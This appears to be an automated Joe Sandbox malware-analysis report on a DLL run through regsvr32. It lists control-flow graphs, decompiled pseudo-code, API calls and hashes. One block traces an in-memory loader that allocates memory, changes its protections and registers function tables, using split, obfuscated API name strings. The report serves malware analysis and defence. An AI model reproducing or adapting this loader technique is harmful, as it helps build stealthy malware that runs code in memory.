                                                                                                        • String ID: $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$E$E$E$E$E$E$E$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
                                                                                                        • API String ID: 0-872547024
                                                                                                        • Opcode ID: 8d8e41402fa9ade4c982e5b92e0f0906a787b6072c1ffc9a98ef163c959b00e9
                                                                                                        • Instruction ID: 9fb854e088c8c77549699e06013090d9c56e4aa051953277e1521ef2154f1eb8
                                                                                                        • Opcode Fuzzy Hash: 8d8e41402fa9ade4c982e5b92e0f0906a787b6072c1ffc9a98ef163c959b00e9
                                                                                                        • Instruction Fuzzy Hash: C7A35E1250DBC1C9E332C23CB45878FAE9193A3319F484299D3E41AADBC7AE8155DF67
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 53 b90000-b9029a call b9091c * 2 66 b902a0-b902a4 53->66 67 b90905 53->67 66->67 68 b902aa-b902ae 66->68 69 b90907-b9091a 67->69 68->67 70 b902b4-b902b8 68->70 70->67 71 b902be-b902c5 70->71 71->67 72 b902cb-b902dc 71->72 72->67 73 b902e2-b902eb 72->73 73->67 74 b902f1-b902fc 73->74 74->67 75 b90302-b90312 74->75 76 b9033f-b90371 GetNativeSystemInfo 75->76 77 b90314-b9031a 75->77 76->67 79 b90377-b90393 VirtualAlloc 76->79 78 b9031c-b90324 77->78 80 b9032c-b9032d 78->80 81 b90326-b9032a 78->81 82 b903aa-b903ae 79->82 83 b90395-b903a8 79->83 84 b9032f-b9033d 80->84 81->84 85 b903dc-b903e3 82->85 86 b903b0-b903c2 82->86 83->82 84->76 84->78 87 b903fb-b90417 85->87 88 b903e5-b903f9 85->88 90 b903d4-b903d8 86->90 91 b90419-b9041a 87->91 92 b90458-b90465 87->92 88->87 88->88 93 b903da 90->93 94 b903c4-b903d1 90->94 95 b9041c-b90422 91->95 96 b9046b-b90472 92->96 97 b90537-b90542 92->97 93->87 94->90 98 b90448-b90456 95->98 99 b90424-b90446 95->99 96->97 102 b90478-b90485 96->102 100 b90548-b90559 97->100 101 b906e6-b906ed 97->101 98->92 98->95 99->98 99->99 103 b90562-b90565 100->103 105 b907ac-b907c3 101->105 106 b906f3-b90707 101->106 102->97 104 b9048b-b9048f 102->104 107 b9055b-b9055f 103->107 108 b90567-b90574 103->108 109 b9051b-b90525 104->109 112 b907c9-b907cd 105->112 113 b9087a-b9088d 105->113 110 b907a9-b907aa 106->110 111 b9070d 106->111 107->103 116 b9057a-b9057d 108->116 117 b9060d-b90619 108->117 114 b9052b-b90531 109->114 115 b90494-b904a8 109->115 110->105 118 b90712-b90736 111->118 119 b907d0-b907d3 112->119 137 b9088f-b9089a 113->137 138 b908b3-b908ba 113->138 114->97 114->104 122 b904aa-b904cd 115->122 123 b904cf-b904d3 115->123 116->117 124 b90583-b9059b 116->124 120 b9061f 117->120 121 b906e2-b906e3 117->121 149 b90738-b9073e 118->149 150 b90796-b9079f 118->150 126 b907d9-b907e9 119->126 127 b9085f-b9086d 119->127 130 b90625-b90648 120->130 121->101 132 b90518-b90519 122->132 133 b904e3-b904e7 123->133 134 b904d5-b904e1 123->134 124->117 135 b9059d-b9059e 124->135 128 b907eb-b907ed 126->128 129 b9080d-b9080f 126->129 127->119 131 b90873-b90874 127->131 139 b907fb-b9080b 128->139 140 b907ef-b907f9 128->140 141 b90811-b90820 129->141 142 b90822-b9082b 129->142 164 b9064a-b9064b 130->164 165 b906b2-b906b7 130->165 131->113 132->109 147 b904e9-b904fc 133->147 148 b904fe-b90502 133->148 145 b90511-b90515 134->145 146 b905a0-b90605 135->146 151 b908ab-b908b1 137->151 143 b908eb-b90903 138->143 144 b908bc-b908c4 138->144 159 b9082e-b9083d 139->159 140->159 141->159 142->159 143->69 144->143 156 b908c6-b908e9 RtlAddFunctionTable 144->156 145->132 146->146 160 b90607 146->160 147->145 148->132 158 b90504-b9050e 148->158 152 b90748-b90754 149->152 153 b90740-b90746 149->153 150->118 157 b907a5-b907a6 150->157 151->138 154 b9089c-b908a8 151->154 162 b90764-b90776 152->162 163 b90756-b90757 152->163 161 b9077b-b9078d 153->161 154->151 156->143 157->110 158->145 166 b9084b-b9085c VirtualProtect 159->166 167 b9083f-b90845 159->167 160->117 161->150 179 b9078f-b90794 161->179 162->161 170 b90759-b90762 163->170 171 b9064e-b90651 164->171 172 b906b9-b906bd 165->172 173 b906ce-b906d8 165->173 166->127 167->166 170->162 170->170 176 b9065b-b90666 171->176 177 b90653-b90659 171->177 172->173 174 b906bf-b906c3 172->174 173->130 178 b906de-b906df 173->178 174->173 183 b906c5 174->183 181 b90668-b90669 176->181 182 b90676-b90688 176->182 180 b9068d-b906a3 177->180 178->121 179->149 186 b906ac 180->186 187 b906a5-b906aa 180->187 184 b9066b-b90674 181->184 182->180 183->173 184->182 184->184 186->165 187->171
                                                                                                        APIs
                                                                                                        • GetNativeSystemInfo.KERNELBASE ref: 00B90344
                                                                                                        • VirtualAlloc.KERNELBASE ref: 00B9038A
                                                                                                        • VirtualProtect.KERNELBASE ref: 00B9085C
                                                                                                        • RtlAddFunctionTable.KERNEL32 ref: 00B908E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.261129077.0000000000B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_b90000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
                                                                                                        • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                        • API String ID: 998211078-3605381585
                                                                                                        • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction ID: 991e26b350c84ff35323880632ed008756db85c2ceb916130a1947edaa4460cb
                                                                                                        • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction Fuzzy Hash: AB520530628B488FDB19EF18D8856BAB7F1FB54304F14466DE88BC7251DB34E946CB86
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 311 7ffc28904194-7ffc2890419a 312 7ffc289041d5-7ffc2890432c 311->312 313 7ffc2890419c-7ffc2890419f 311->313 319 7ffc28904332-7ffc2890434d call 7ffc28903da8 312->319 320 7ffc2890432e-7ffc28904330 312->320 315 7ffc289041c9-7ffc28904208 call 7ffc28903f18 313->315 316 7ffc289041a1-7ffc289041a4 313->316 333 7ffc2890420a-7ffc2890420c 315->333 334 7ffc28904211-7ffc28904226 call 7ffc28903da8 315->334 317 7ffc289041a6-7ffc289041a9 316->317 318 7ffc289041bc __scrt_dllmain_crt_thread_attach 316->318 323 7ffc289041ab-7ffc289041b4 317->323 324 7ffc289041b5-7ffc289041ba call 7ffc28903e58 317->324 325 7ffc289041c1-7ffc289041c8 318->325 331 7ffc28904359-7ffc28904380 call 7ffc28903ed4 call 7ffc28903f04 call 7ffc289040cc call 7ffc289040f0 319->331 332 7ffc2890434f-7ffc28904354 call 7ffc28904944 319->332 326 7ffc28904382-7ffc28904391 320->326 324->325 331->326 332->331 338 7ffc289042f9-7ffc2890430e 333->338 343 7ffc28904228-7ffc2890422d call 7ffc28904944 334->343 344 7ffc28904232-7ffc28904243 call 7ffc28903e18 334->344 343->344 351 7ffc28904245-7ffc28904281 call 7ffc28904b90 call 7ffc2890416c call 7ffc28904b40 call 7ffc2890416c call 7ffc28904b6c call 7ffc2890a908 344->351 352 7ffc289042ac-7ffc289042b6 call 7ffc289040cc 344->352 351->352 379 7ffc28904283-7ffc2890428a __scrt_dllmain_after_initialize_c 351->379 352->333 359 7ffc289042bc-7ffc289042c8 call 7ffc28904b88 352->359 366 7ffc289042ca-7ffc289042d4 call 7ffc28904030 359->366 367 7ffc289042ee-7ffc289042f4 359->367 366->367 373 7ffc289042d6-7ffc289042e9 call 7ffc28904a8c 366->373 367->338 373->367 379->352 380 7ffc2890428c-7ffc289042a9 call 7ffc2890a8c4 379->380 380->352
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC28904194(void* __edx) {
                                                                                                        				void* _t5;
                                                                                                        
                                                                                                        				_t5 = __edx;
                                                                                                        				if (_t5 == 0) goto 0x289041d5;
                                                                                                        				if (_t5 == 0) goto 0x289041c9;
                                                                                                        				if (_t5 == 0) goto 0x289041bc;
                                                                                                        				if (__edx == 1) goto 0x289041b5;
                                                                                                        				return 1;
                                                                                                        			}




                                                                                                        0x7ffc28904198
                                                                                                        0x7ffc2890419a
                                                                                                        0x7ffc2890419f
                                                                                                        0x7ffc289041a4
                                                                                                        0x7ffc289041a9
                                                                                                        0x7ffc289041b4

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3885183344-0
                                                                                                        • Opcode ID: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
                                                                                                        • Instruction ID: 30c63b6c74b8b070ad72e6e7c8f9ed11ef61b8ef137c02565fa8d872e4a67c64
                                                                                                        • Opcode Fuzzy Hash: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
                                                                                                        • Instruction Fuzzy Hash: C151C221F0C66B85FA50B765AC413B92290EF9634BF488037E90D576D7CE2EE445C778
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC28901580(long long __rcx, long long __rdx, long long _a8, void* _a16) {
                                                                                                        				char _v16;
                                                                                                        				char _v24;
                                                                                                        				long long _v32;
                                                                                                        				void* _v40;
                                                                                                        				long long _v48;
                                                                                                        				long long _v56;
                                                                                                        				void* _t41;
                                                                                                        				intOrPtr* _t49;
                                                                                                        				void* _t77;
                                                                                                        
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v32 = 0xfffffffe;
                                                                                                        				_t49 = _a16;
                                                                                                        				if (_a8 == _t49) goto 0x28901693;
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC28901910(1, _t49, _a8, _t77); // executed
                                                                                                        				if (0 == 1) goto 0x2890160a;
                                                                                                        				E00007FFC7FFC28901850(_a16);
                                                                                                        				_v56 = _t49;
                                                                                                        				E00007FFC7FFC28901850(_a8);
                                                                                                        				if ((E00007FFC7FFC28902A50(_t49, _v56) & 0x000000ff) == 0) goto 0x2890160a;
                                                                                                        				E00007FFC7FFC28901850(_a16);
                                                                                                        				E00007FFC7FFC28901870(_t49, _a8, _t49);
                                                                                                        				E00007FFC7FFC28901850(_a16);
                                                                                                        				_v48 = _t49;
                                                                                                        				E00007FFC7FFC28901850(_a8);
                                                                                                        				if ((E00007FFC7FFC28902A50(_t49, _v48) & 0x000000ff) == 0) goto 0x2890167a;
                                                                                                        				E00007FFC7FFC28901A20(_t49, _a16,  &_v24);
                                                                                                        				_v40 = _t49;
                                                                                                        				E00007FFC7FFC28901AA0(_t49, _a16,  &_v16);
                                                                                                        				_t41 = E00007FFC7FFC28902A90(E00007FFC7FFC28902A50(_t49, _v48) & 0x000000ff, _t49, _a8,  *_t49,  *_v40);
                                                                                                        				goto 0x28901693;
                                                                                                        				E00007FFC7FFC28902B00(_t41, _a16);
                                                                                                        				return E00007FFC7FFC28901F00(_t49, _a8, _t49);
                                                                                                        			}












                                                                                                        0x7ffc28901580
                                                                                                        0x7ffc28901585
                                                                                                        0x7ffc2890158e
                                                                                                        0x7ffc28901597
                                                                                                        0x7ffc289015a1
                                                                                                        0x7ffc289015a7
                                                                                                        0x7ffc289015b1
                                                                                                        0x7ffc289015bc
                                                                                                        0x7ffc289015c3
                                                                                                        0x7ffc289015c9
                                                                                                        0x7ffc289015d3
                                                                                                        0x7ffc289015ef
                                                                                                        0x7ffc289015f6
                                                                                                        0x7ffc28901604
                                                                                                        0x7ffc2890160f
                                                                                                        0x7ffc28901615
                                                                                                        0x7ffc2890161f
                                                                                                        0x7ffc2890163b
                                                                                                        0x7ffc28901647
                                                                                                        0x7ffc2890164d
                                                                                                        0x7ffc2890165c
                                                                                                        0x7ffc28901672
                                                                                                        0x7ffc28901678
                                                                                                        0x7ffc2890167f
                                                                                                        0x7ffc2890169c

                                                                                                        APIs
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289015C3
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289015D3
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289015F6
                                                                                                          • Part of subcall function 00007FFC28901870: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC28901883
                                                                                                        • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFC289015E4
                                                                                                          • Part of subcall function 00007FFC28902A50: type_info::_name_internal_method.LIBCMTD ref: 00007FFC28902A68
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890160F
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890161F
                                                                                                        • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFC28901630
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$EmptyQueue::StructuredWork$Affinity::operator!=Hardware$type_info::_name_internal_method
                                                                                                        • String ID:
                                                                                                        • API String ID: 1937815552-0
                                                                                                        • Opcode ID: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
                                                                                                        • Instruction ID: f34889788a7257e15179163aa178f76ae4600117aeb1035697b0cf7151657706
                                                                                                        • Opcode Fuzzy Hash: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
                                                                                                        • Instruction Fuzzy Hash: D6310D31A5DA5981DA11FB22EC5157B63A1FBC57C1F001536FA8D837EACE2DE440CB18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E00007FFC7FFC28902600(long long __rcx, signed int __rdx, long long __r8, long long _a8, signed int _a16, long long _a24) {
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				void* _v64;
                                                                                                        				long long _v72;
                                                                                                        				long long _v80;
                                                                                                        				long long _v88;
                                                                                                        				long long _v96;
                                                                                                        				long long _v104;
                                                                                                        				char _v112;
                                                                                                        				signed long long _v120;
                                                                                                        				void* _t82;
                                                                                                        				signed long long _t111;
                                                                                                        				intOrPtr* _t113;
                                                                                                        				intOrPtr* _t114;
                                                                                                        				long long _t115;
                                                                                                        				intOrPtr* _t116;
                                                                                                        				intOrPtr* _t117;
                                                                                                        				signed long long _t118;
                                                                                                        				long long _t120;
                                                                                                        				long long* _t121;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v24 = 0xfffffffe;
                                                                                                        				_t111 = _a16 | 0x0000000f;
                                                                                                        				_v120 = _t111;
                                                                                                        				E00007FFC7FFC28902830(_t111, _a8);
                                                                                                        				if (_t111 - _v120 >= 0) goto 0x28902659;
                                                                                                        				_v120 = _a16;
                                                                                                        				goto 0x28902736;
                                                                                                        				_t113 = _v120;
                                                                                                        				_v104 = _t113;
                                                                                                        				E00007FFC7FFC28902150(_t113, _a8);
                                                                                                        				_t114 =  *_t113;
                                                                                                        				if (_t114 - _v104 > 0) goto 0x28902696;
                                                                                                        				goto 0x28902736;
                                                                                                        				E00007FFC7FFC28902150(_t114, _a8);
                                                                                                        				_t115 =  *_t114;
                                                                                                        				_v96 = _t115;
                                                                                                        				E00007FFC7FFC28902830(_t115, _a8);
                                                                                                        				_t116 = _t115 - _v96;
                                                                                                        				_v88 = _t116;
                                                                                                        				E00007FFC7FFC28902150(_t116, _a8);
                                                                                                        				if ( *_t116 - _v88 > 0) goto 0x28902724;
                                                                                                        				E00007FFC7FFC28902150(_t116, _a8);
                                                                                                        				_t117 =  *_t116;
                                                                                                        				_v80 = _t117;
                                                                                                        				E00007FFC7FFC28902150(_t117, _a8);
                                                                                                        				_t118 = _v80 +  *_t117;
                                                                                                        				_v120 = _t118;
                                                                                                        				goto 0x28902736;
                                                                                                        				E00007FFC7FFC28902830(_t118, _a8);
                                                                                                        				_v120 = _t118;
                                                                                                        				_t120 = _v120 + 1;
                                                                                                        				_v72 = _t120;
                                                                                                        				E00007FFC7FFC28901850(_a8);
                                                                                                        				E00007FFC7FFC289028E0(_t120, _v72); // executed
                                                                                                        				_v64 = _t120;
                                                                                                        				_t121 = _v64;
                                                                                                        				_v112 = _t121;
                                                                                                        				goto 0x28902771;
                                                                                                        				if (_a24 <= 0) goto 0x289027b0;
                                                                                                        				_t82 = E00007FFC7FFC289018F0(_t121, _a8);
                                                                                                        				_v40 = _t121;
                                                                                                        				E00007FFC7FFC28902C00(_t82, _v112);
                                                                                                        				E00007FFC7FFC289011E0(_t121, _v40, _a24);
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC28901910(1, _t121, _a8, _a24);
                                                                                                        				E00007FFC7FFC28902BC0(E00007FFC7FFC28902190(_a8), _t121);
                                                                                                        				_v32 = _t121;
                                                                                                        				E00007FFC7FFC28901850(_a8);
                                                                                                        				E00007FFC7FFC28902C10(_t121, _t121, _v32,  &_v112);
                                                                                                        				E00007FFC7FFC28902150(_t121, _a8);
                                                                                                        				 *_t121 = _v120;
                                                                                                        				return E00007FFC7FFC289023A0(_t121, _a8, _a24);
                                                                                                        			}
























                                                                                                        0x7ffc28902600
                                                                                                        0x7ffc28902605
                                                                                                        0x7ffc2890260a
                                                                                                        0x7ffc28902616
                                                                                                        0x7ffc2890262a
                                                                                                        0x7ffc2890262e
                                                                                                        0x7ffc2890263b
                                                                                                        0x7ffc28902645
                                                                                                        0x7ffc2890264f
                                                                                                        0x7ffc28902654
                                                                                                        0x7ffc2890265b
                                                                                                        0x7ffc28902668
                                                                                                        0x7ffc28902675
                                                                                                        0x7ffc2890267c
                                                                                                        0x7ffc2890268f
                                                                                                        0x7ffc28902691
                                                                                                        0x7ffc2890269e
                                                                                                        0x7ffc289026a5
                                                                                                        0x7ffc289026b0
                                                                                                        0x7ffc289026bd
                                                                                                        0x7ffc289026c7
                                                                                                        0x7ffc289026ca
                                                                                                        0x7ffc289026d7
                                                                                                        0x7ffc289026e4
                                                                                                        0x7ffc289026ee
                                                                                                        0x7ffc289026f5
                                                                                                        0x7ffc28902700
                                                                                                        0x7ffc2890270d
                                                                                                        0x7ffc2890271a
                                                                                                        0x7ffc2890271d
                                                                                                        0x7ffc28902722
                                                                                                        0x7ffc2890272c
                                                                                                        0x7ffc28902731
                                                                                                        0x7ffc2890273b
                                                                                                        0x7ffc2890273e
                                                                                                        0x7ffc2890274b
                                                                                                        0x7ffc2890275b
                                                                                                        0x7ffc28902760
                                                                                                        0x7ffc28902765
                                                                                                        0x7ffc2890276a
                                                                                                        0x7ffc2890276f
                                                                                                        0x7ffc2890277a
                                                                                                        0x7ffc28902784
                                                                                                        0x7ffc28902789
                                                                                                        0x7ffc28902793
                                                                                                        0x7ffc289027ab
                                                                                                        0x7ffc289027b0
                                                                                                        0x7ffc289027bd
                                                                                                        0x7ffc289027d2
                                                                                                        0x7ffc289027d7
                                                                                                        0x7ffc289027e4
                                                                                                        0x7ffc289027f9
                                                                                                        0x7ffc28902806
                                                                                                        0x7ffc28902810
                                                                                                        0x7ffc2890282f

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC28902830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890283E
                                                                                                          • Part of subcall function 00007FFC28902830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFC2890284B
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890274B
                                                                                                        • type_info::_name_internal_method.LIBCMTD ref: 00007FFC2890275B
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28902784
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC289027AB
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289027E4
                                                                                                        • construct.LIBCPMTD ref: 00007FFC289027F9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Work$EmptyQueue::Structured$Base::$BridgeContextDispatchIdentityQueueSchedulerThrottlerchar_traitsconstructtype_info::_name_internal_method
                                                                                                        • String ID:
                                                                                                        • API String ID: 3284725307-0
                                                                                                        • Opcode ID: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
